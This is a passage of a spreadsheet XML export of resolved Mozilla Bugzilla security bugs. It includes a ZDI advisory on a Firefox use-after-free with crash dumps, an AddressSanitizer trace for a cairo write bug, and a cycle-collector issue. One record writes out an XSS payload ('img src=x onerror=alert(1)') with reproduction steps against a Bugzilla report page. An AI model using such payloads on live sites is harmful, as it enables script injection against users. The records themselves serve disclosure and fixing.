          <t>Mozilla Firefox nsXULCommandDispatcher Remote Code Execution Vulnerability (ZDI-CAN-1203)</t>
        </is>
      </c>
      <c r="D378" t="inlineStr">
        <is>
          <t>2011-07-12 09:06:43 -0700</t>
        </is>
      </c>
      <c r="E378" t="n">
        <v>1</v>
      </c>
      <c r="F378" t="n">
        <v>1</v>
      </c>
      <c r="G378" t="n">
        <v>3</v>
      </c>
      <c r="H378" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I378" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J378" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K378" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L378" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M378" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N378" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P378" t="inlineStr">
        <is>
          <t>[sg:critical][needs 1.9.2 testing]</t>
        </is>
      </c>
      <c r="Q378" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S378" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T378" t="n">
        <v>1</v>
      </c>
      <c r="U378" t="n">
        <v>0</v>
      </c>
      <c r="V378" t="n">
        <v>15</v>
      </c>
      <c r="W378" t="inlineStr">
        <is>
          <t>Created attachment 524251
PoC
ZDI-CAN-1203: Mozilla Firefox nsXULCommandDispatcher Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
    Mozilla Firefox
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Firefox. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within nsXULCommandDispatcher.cpp. During a NS_XUL_COMMAND_UPDATE event dispatch, the user is able to force command
dispatcher to remove all the updaters in the mUpdaters chain including the one that is currently in use. As a result, the local variable updater becomes a stale pointer and updater-&gt;mNext refers to memory previously freed. Successful exploitation can lead to code execution in the context of the browser.
Version(s)  tested: 3.6.16
Platform(s) tested: Windows XP SP3
dispatcher-use-after-free1.xul results in the following crash:
(700.4b0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000001 ecx=0012e7e4 edx=c1c2c3c8 esi=0012ec4c
edi=0012ec4c
eip=101a501e esp=0012e7dc ebp=c1c2c3c8 iopl=0         nv up ei pl nz ac
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            
efl=00000216
xul!nsXULCommandDispatcher::Matches+0xe:
101a501e 395d04          cmp     dword ptr [ebp+4],ebx
ss:0023:c1c2c3cc=????????
0:000&gt; k
ChildEBP RetAddr
0012e7ec 1008d44b xul!nsXULCommandDispatcher::Matches+0xe
[content\xul\document\src\nsxulcommanddispatcher.cpp @ 462] 0012e8fc
1027415b xul!nsXULCommandDispatcher::UpdateCommands+0x9b
[content\xul\document\src\nsxulcommanddispatcher.cpp @ 412]
0012e910 10118e9e xul!NS_InvokeByIndex_P+0x27
[xpcom\reflect\xptcall\src\md\win32\xptcinvoke.cpp @ 103]
0012eba8 10114cb3 xul!XPCWrappedNative::CallMethod+0x52e
[js\src\xpconnect\src\xpcwrappednative.cpp @ 2722]
0012ec74 0051790d xul!XPC_WN_CallMethod+0x173
[js\src\xpconnect\src\xpcwrappednativejsops.cpp @ 1740]
0012ed28 0051c654 js3250!js_Invoke+0x42d [js\src\jsinterp.cpp @ 1360]
0012ef64 00517766 js3250!js_Interpret+0x29c4 [js\src\jsops.cpp @ 2241]
0012f008 0050c1f3 js3250!js_Invoke+0x286 [js\src\jsinterp.cpp @ 1368]
0012f038 004ef727 js3250!js_InternalInvoke+0x103 [js\src\jsinterp.cpp @
1423]
0012f060 101870a8 js3250!JS_CallFunctionValue+0x27 [js\src\jsapi.cpp @
5115] 0012f0dc 1018bef3 xul!nsJSContext::CallEventHandler+0x188
[dom\base\nsjsenvironment.cpp @ 2198]
0012f288 1008673f xul!nsJSEventListener::HandleEvent+0x223
[dom\src\events\nsjseventlistener.cpp @ 269]
0012f378 1012b311 xul!nsEventListenerManager::HandleEventSubType+0x38
[content\events\src\nseventlistenermanager.cpp @ 1041]
0012f3d8 1012ad41 xul!nsEventListenerManager::HandleEvent+0x281
[content\events\src\nseventlistenermanager.cpp @ 1147]
0012f420 10117418
xul!nsEventTargetChainItem::HandleEventTargetChain+0x281
[content\events\src\nseventdispatcher.cpp @ 312] 0012f4ac 10071f3a
xul!nsEventDispatcher::Dispatch+0x478
[content\events\src\nseventdispatcher.cpp @ 577]
0012f518 1008023c xul!DocumentViewerImpl::LoadComplete+0x100
[layout\base\nsdocumentviewer.cpp @ 1036]
0012f708 10095402 xul!nsDocShell::EndPageLoad+0xda
[docshell\base\nsdocshell.cpp @ 5722]
0012f730 100da833 xul!nsDocShell::OnStateChange+0xa2
[docshell\base\nsdocshell.cpp @ 5587] 0012f76c 100417d3
xul!nsDocLoader::FireOnStateChange+0x123 [uriloader\base\nsdocloader.cpp
@ 1314]
0012f780 10084015 xul!nsDocLoader::doStopDocumentLoad+0x1c
[uriloader\base\nsdocloader.cpp @ 937]
0012f7b0 100aba6b xul!nsDocLoader::DocLoaderIsEmpty+0x155
[uriloader\base\nsdocloader.cpp @ 804] 0012f7dc 10174d00
xul!nsDocLoader::OnStopRequest+0xdb [uriloader\base\nsdocloader.cpp @
697]
0012f810 101ad388 xul!nsLoadGroup::RemoveRequest+0xc0
[netwerk\base\src\nsloadgroup.cpp @ 680]
0012f830 101acc20 xul!nsDocument::DoUnblockOnload+0x4f
[content\base\src\nsdocument.cpp @ 7179]
0012f838 101acc75 xul!nsDocument::UnblockOnload+0x5d
[content\base\src\nsdocument.cpp @ 7120] 0012f84c 10020f4d
xul!nsBindingManager::DoProcessAttachedQueue+0x53
[content\xbl\src\nsbindingmanager.cpp @ 996]
0012f850 100f41d0 xul!nsRunnableMethod&lt;nsBindingManager,void&gt;::Run+0xe
[obj-firefox\dist\include\nsthreadutils.h @ 283]
0012f880 101a0552 xul!nsThread::ProcessNextEvent+0x210
[xpcom\threads\nsthread.cpp @ 533]
0012f8a8 10230895 xul!NS_ProcessPendingEvents_P+0x25
[obj-firefox\xpcom\build\nsthreadutils.cpp @ 200]
0012f8b4 103f2535 xul!nsWindow::DispatchPendingEvents+0x2f
[widget\src\windows\nswindow.cpp @ 3143]
0012f9b8 100d00e5 xul!nsWindow::ProcessMessage+0x337915
0012f9f4 7e368734 xul!nsWindow::WindowProc+0xf5
[widget\src\windows\nswindow.cpp @ 3727]
0012fa20 7e368816 USER32!InternalCallWinProc+0x28
0012fa88 7e3689cd USER32!UserCallWinProcCheckWow+0x150
0012fae8 7e368a10 USER32!DispatchMessageWorker+0x306
0012faf8 100d23ae USER32!DispatchMessageW+0xf
0012fb64 100d25c7 xul!nsAppShell::ProcessNextNativeEvent+0xae
[widget\src\windows\nsappshell.cpp @ 179]
0012fb84 100f4115 xul!nsBaseAppShell::OnProcessNextEvent+0x1f7
[widget\src\xpwidgets\nsbaseappshell.cpp @ 299]
0012fbc0 1015f939 xul!nsThread::ProcessNextEvent+0x155
[xpcom\threads\nsthread.cpp @ 510]
0012fc00 1022a073 xul!mozilla::ipc::MessagePump::Run+0x69
[ipc\glue\messagepump.cpp @ 110] 0012fc3c 1022a03b
xul!MessageLoop::RunHandler+0x26 [ipc\chromium\src\base\message_loop.cc
@ 200]
0012fc74 10229140 xul!MessageLoop::Run+0x1f
[ipc\chromium\src\base\message_loop.cc @ 174]
0012fc80 1022a1eb xul!nsBaseAppShell::Run+0x34
[widget\src\xpwidgets\nsbaseappshell.cpp @ 180] 0012fc8c 1002e9fd
xul!nsAppStartup::Run+0x1e
[toolkit\components\startup\src\nsappstartup.cpp @ 184]
0012ff34 0040133b xul!XRE_main+0xdc3 [toolkit\xre\nsapprunner.cpp @
3485]
0012ff80 004016c2 firefox!wmain+0x33b [toolkit\xre\nswindowswmain.cpp @
120]
0012ffc0 7c817077 firefox!__tmainCRTStartup+0x152
[obj-firefox\memory\jemalloc\crtsrc\crtexe.c @ 591]
0012fff0 00000000 kernel32!BaseProcessStart+0x23 
dispatcher-use-after-free2.xul demonstrates EIP control and results in
the following crash:
(574.614): Access violation - code c0000005 (!!! second chance !!!)
eax=0c301010 ebx=0c301021 ecx=0c301014 edx=c1c2c3c4 esi=0012eb48
edi=0012eb28
eip=c1c2c3c4 esp=0012eb0c ebp=0012ec3c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
c1c2c3c4 ?? ???
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X378" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="379">
      <c r="A379" t="n">
        <v>839745</v>
      </c>
      <c r="B379" t="inlineStr">
        <is>
          <t>2013-02-08 21:51:13 -0800</t>
        </is>
      </c>
      <c r="C379" t="inlineStr">
        <is>
          <t>Invalid write in _cairo_xlib_surface_add_glyph</t>
        </is>
      </c>
      <c r="D379" t="inlineStr">
        <is>
          <t>2014-11-19 19:39:23 -0800</t>
        </is>
      </c>
      <c r="E379" t="n">
        <v>1</v>
      </c>
      <c r="F379" t="n">
        <v>1</v>
      </c>
      <c r="G379" t="n">
        <v>3</v>
      </c>
      <c r="H379" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I379" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J379" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K379" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L379" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P379" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q379" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R379" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S379" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T379" t="n">
        <v>1</v>
      </c>
      <c r="U379" t="n">
        <v>0</v>
      </c>
      <c r="V379" t="n">
        <v>22</v>
      </c>
      <c r="W379" t="inlineStr">
        <is>
          <t>Created attachment 712073
Testcase
&gt;==10987== ERROR: AddressSanitizer: unknown-crash on address 0x60920001abfc at pc 0x411d13 bp 0x7fffcc9bcb00 sp 0x7fffcc9bcad8
&gt;WRITE of size 8 at 0x60920001abfc thread T0
&gt;    #0 0x411d12 in __interceptor_memmove
&gt;    #1 0x7f85d2e03e8d in
&gt;    #2 0x7f85d7d44ab5 in _cairo_xlib_surface_add_glyph src/gfx/cairo/cairo/src/cairo-xlib-surface.c:4321
&gt;    #3 0x7f85d7d44ab5 in _cairo_xlib_surface_emit_glyphs src/gfx/cairo/cairo/src/cairo-xlib-surface.c:4577
&gt;    #4 0x7f85d7d44ab5 in _cairo_xlib_surface_show_glyphs src/gfx/cairo/cairo/src/cairo-xlib-surface.c:4904
&gt;    #5 0x7f85d7ccd8ff in _cairo_surface_show_text_glyphs src/gfx/cairo/cairo/src/cairo-surface.c:2763
&gt;    #6 0x7f85d7c5a40c in _cairo_gstate_show_text_glyphs src/gfx/cairo/cairo/src/cairo-gstate.c:1998
&gt;    #7 0x7f85d7c2d056 in _moz_cairo_show_glyphs src/gfx/cairo/cairo/src/cairo.c:3523
&gt;    #8 0x7f85d796b3d8 in GlyphBuffer::Flush(_cairo*, gfxFont::DrawMode, bool, gfxTextObjectPaint*, gfxMatrix const&amp;, bool) src/gfx/thebes/gfxFont.cpp:1576
&gt;    #9 0x7f85d79680f7 in gfxFont::Draw(gfxTextRun*, unsigned int, unsigned int, gfxContext*, gfxFont::DrawMode, gfxPoint*, gfxFont::Spacing*, gfxTextObjectPaint*) src/gfx/thebes/gfxFont.cpp:1967
&gt;    #10 0x7f85d797ec4b in gfxTextRun::DrawGlyphs(gfxFont*, gfxContext*, gfxFont::DrawMode, gfxPoint*, gfxTextObjectPaint*, unsigned int, unsigned int, gfxTextRun::PropertyProvider*, unsigned int, unsigned int) src/gfx/thebes/gfxFont.cpp:4950
&gt;    #11 0x7f85d797fe06 in gfxTextRun::Draw(gfxContext*, gfxPoint, gfxFont::DrawMode, unsigned int, unsigned int, gfxTextRun::PropertyProvider*, double*, gfxTextObjectPaint*, gfxTextRun::DrawCallbacks*) src/gfx/thebes/gfxFont.cpp:5151
&gt;    #12 0x7f85d5eea3ea in nsSVGGlyphFrame::DrawCharacters(CharacterIterator*, gfxContext*, gfxFont::DrawMode, gfxTextObjectPaint*) src/layout/svg/nsSVGGlyphFrame.cpp:613
&gt;    #13 0x7f85d5ee9d4d in nsSVGGlyphFrame::PaintSVG(nsRenderingContext*, nsIntRect const*) src/layout/svg/nsSVGGlyphFrame.cpp:441
&gt;    #14 0x7f85d5ee7fc9 in nsDisplaySVGGlyphs::Paint(nsDisplayListBuilder*, nsRenderingContext*) src/layout/svg/nsSVGGlyphFrame.cpp:254
&gt;    #15 0x7f85d4301d3c in mozilla::FrameLayerBuilder::DrawThebesLayer(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*) src/layout/base/FrameLayerBuilder.cpp:3341
&gt;    #16 0x7f85d7a25232 in PaintBuffer src/gfx/layers/basic/BasicThebesLayer.h:94
&gt;    #17 0x7f85d7a25232 in mozilla::layers::BasicShadowableThebesLayer::PaintBuffer(gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, nsIntRegion const&amp;, bool, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*) src/gfx/layers/basic/BasicThebesLayer.cpp:400
&gt;    #18 0x7f85d7a21b9e in mozilla::layers::BasicThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:187
&gt;    #19 0x7f85d7a2472b in mozilla::layers::BasicShadowableThebesLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicThebesLayer.cpp:301
&gt;    #20 0x7f85d7a02b35 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:819
&gt;    #21 0x7f85d7a005fa in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:934
&gt;    #22 0x7f85d7a02975 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:835
&gt;    #23 0x7f85d7a005fa in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:934
&gt;    #24 0x7f85d7a02975 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintContext&amp;, gfxContext*) src/gfx/layers/basic/BasicLayerManager.cpp:835
&gt;    #25 0x7f85d7a005fa in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::ReadbackProcessor*) src/gfx/layers/basic/BasicLayerManager.cpp:934
&gt;    #26 0x7f85d79fd825 in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:590
&gt;    #27 0x7f85d7a06125 in EndTransaction src/gfx/layers/basic/BasicLayerManager.cpp:509
&gt;    #28 0x7f85d7a06125 in mozilla::layers::BasicShadowLayerManager::EndTransaction(void (*)(mozilla::layers::ThebesLayer*, gfxContext*, nsIntRegion const&amp;, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) src/gfx/layers/basic/BasicLayerManager.cpp:1144
&gt;    #29 0x7f85d43c4970 in nsDisplayList::PaintForFrame(nsDisplayListBuilder*, nsRenderingContext*, nsIFrame*, unsigned int) const src/layout/base/nsDisplayList.cpp:1168
&gt;    #30 0x7f85d43c36db in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) const src/layout/base/nsDisplayList.cpp:1030
&gt;    #31 0x7f85d443df42 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) src/layout/base/nsLayoutUtils.cpp:2014
&gt;    #32 0x7f85d449d7d7 in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) src/layout/base/nsPresShell.cpp:5414
&gt;    #33 0x7f85d5500bcb in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) src/view/src/nsViewManager.cpp:399
&gt;    #34 0x7f85d44bc175 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) src/layout/base/nsRefreshDriver.cpp:955
&gt;    #35 0x7f85d44beaf3 in TickDriver src/layout/base/nsRefreshDriver.cpp:164
&gt;    #36 0x7f85d44beaf3 in mozilla::RefreshDriverTimer::Tick() src/layout/base/nsRefreshDriver.cpp:156
&gt;    #37 0x7f85d784b194 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:482
&gt;    #38 0x7f85d784b762 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:565
&gt;    #39 0x7f85d783fdee in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;    #40 0x7f85d7777ce2 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:238
&gt;    #41 0x7f85d6f00bec in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #42 0x7f85d78d1aa8 in RunInternal src/ipc/chromium/src/base/message_loop.cc:215
&gt;    #43 0x7f85d78d1aa8 in RunHandler src/ipc/chromium/src/base/message_loop.cc:208
&gt;    #44 0x7f85d78d1aa8 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
&gt;    #45 0x7f85d6bf69dd in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #46 0x7f85d6679340 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #47 0x7f85d3bb93ac in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3826
&gt;    #48 0x7f85d3bba23f in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3893
&gt;    #49 0x7f85d3bbb201 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4096
&gt;    #50 0x41fd9b in do_main src/browser/app/nsBrowserApp.cpp:185
&gt;    #51 0x41fd9b in main src/browser/app/nsBrowserApp.cpp:377
&gt;    #52 0x7f85dd8d276c in
&gt;    #53 0x41f114 in
&gt;0x60920001ac00 is located 0 bytes to the right of 16384-byte region [0x609200016c00,0x60920001ac00)
&gt;allocated by thread T0 here:
&gt;    #0 0x413e83 in __interceptor_calloc
&gt;    #1 0x7f85d1e5ee2d in
&gt;Shadow bytes around the buggy address:
&gt;  0x1c1240003520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1c1240003530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1c1240003540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1c1240003550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x1c1240003560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;=&gt;0x1c1240003570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[00]
&gt;  0x1c1240003580:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1c1240003590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1c12400035a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1c12400035b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x1c12400035c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap righ redzone:     fb
&gt;  Freed Heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
&gt;==10987== ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X379" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="380">
      <c r="A380" t="n">
        <v>924932</v>
      </c>
      <c r="B380" t="inlineStr">
        <is>
          <t>2013-10-09 07:51:59 -0700</t>
        </is>
      </c>
      <c r="C380" t="inlineStr">
        <is>
          <t>[SECURITY] Field values are (still) not escaped correctly in tabular reports</t>
        </is>
      </c>
      <c r="D380" t="inlineStr">
        <is>
          <t>2024-05-30 08:08:05 -0700</t>
        </is>
      </c>
      <c r="E380" t="n">
        <v>1</v>
      </c>
      <c r="F380" t="n">
        <v>1</v>
      </c>
      <c r="G380" t="n">
        <v>4</v>
      </c>
      <c r="H380" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I380" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J380" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K380" t="inlineStr">
        <is>
          <t>4.1.1</t>
        </is>
      </c>
      <c r="L380" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M380" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N380" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P380" t="inlineStr"/>
      <c r="Q380" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R380" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S380" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T380" t="n">
        <v>1</v>
      </c>
      <c r="U380" t="n">
        <v>0</v>
      </c>
      <c r="V380" t="n">
        <v>24</v>
      </c>
      <c r="W380" t="inlineStr">
        <is>
          <t>1. Create bug with summary: test'"&gt;'"&gt;&lt;img src=x onerror=alert(1); '"&gt;
2.
https://landfill.bugzilla.org/bugzilla-tip/report.cgi?x_axis_field=short_desc&amp;y_axis_field=short_desc&amp;z_axis_field=short_desc&amp;no_redirect=1&amp;query_format=report-table&amp;short_desc_type=allwordssubstr&amp;short_desc=&amp;resolution=---&amp;longdesc_type=allwordssubstr&amp;longdesc=&amp;bug_file_loc_type=allwordssubstr&amp;bug_file_loc=&amp;status_whiteboard_type=allwordssubstr&amp;status_whiteboard=&amp;keywords_type=allwords&amp;keywords=&amp;deadlinefrom=&amp;deadlineto=&amp;bug_id=22386%2C22387&amp;bug_id_type=anyexact&amp;emailassigned_to1=1&amp;emailtype1=substring&amp;email1=&amp;emailassigned_to2=1&amp;emailreporter2=1&amp;emailqa_contact2=1&amp;emailcc2=1&amp;emailtype2=substring&amp;email2=&amp;emaillongdesc3=1&amp;emailtype3=substring&amp;email3=&amp;chfieldvalue=&amp;chfieldfrom=&amp;chfieldto=Now&amp;j_top=AND&amp;f1=noop&amp;o1=noop&amp;v1=&amp;format=table&amp;action=wrap</t>
        </is>
      </c>
      <c r="X380" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" t="n">
        <v>723971</v>
      </c>
      <c r="B381" t="inlineStr">
        <is>
          <t>2012-02-03 08:54:05 -0800</t>
        </is>
      </c>
      <c r="C381" t="inlineStr">
        <is>
          <t>black-gray edges due to shapes in UnmarkGrayChildren</t>
        </is>
      </c>
      <c r="D381" t="inlineStr">
        <is>
          <t>2012-07-20 14:35:38 -0700</t>
        </is>
      </c>
      <c r="E381" t="n">
        <v>1</v>
      </c>
      <c r="F381" t="n">
        <v>1</v>
      </c>
      <c r="G381" t="n">
        <v>3</v>
      </c>
      <c r="H381" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I381" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J381" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K381" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L381" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M381" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N381" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P381" t="inlineStr">
        <is>
          <t>[sg:moderate][qa-] [advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q381" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R381" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S381" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T381" t="n">
        <v>1</v>
      </c>
      <c r="U381" t="n">
        <v>0</v>
      </c>
      <c r="V381" t="n">
        <v>21</v>
      </c>
      <c r="W381" t="inlineStr">
        <is>
          <t>This is another instance of the "use after unlink" problem described in bug 690970, where a black-gray edge can cause the cycle collector to think something is dead when it is alive, and call Unlink on it.  This probably only can causes null derefs, but Unlink functions are written by hand in C++, so who knows.
A shape can hold onto a non-shape, but UnmarkGrayChildren stops if it reaches a shape.  Thus there can be an edge from a black object to a gray shape.
We can't just remove this check, because it may cause the stack limit to be hit more often, which will trigger GCs more often.  Instead, we need to use JS_TraceShapeCycleCollectorChildren.</t>
        </is>
      </c>
      <c r="X381" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" t="n">
        <v>1429539</v>
      </c>
      <c r="B382" t="inlineStr">
        <is>
          <t>2018-01-10 11:12:08 -0800</t>
        </is>
      </c>
      <c r="C382" t="inlineStr">
        <is>
          <t>[ops infra socorro] populate -prod-new with crash data</t>
        </is>
      </c>
      <c r="D382" t="inlineStr">
        <is>
          <t>2018-03-21 07:06:18 -0700</t>
        </is>
      </c>
      <c r="E382" t="n">
        <v>1</v>
      </c>
      <c r="F382" t="n">
        <v>1</v>
      </c>
      <c r="G382" t="n">
        <v>4</v>
      </c>
      <c r="H382" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I382" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J382" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K382" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L382" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M382" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N382" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P382" t="inlineStr"/>
      <c r="Q382" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R382" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S382" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T382" t="n">
        <v>1</v>
      </c>
      <c r="U382" t="n">
        <v>0</v>
      </c>
      <c r="V382" t="n">
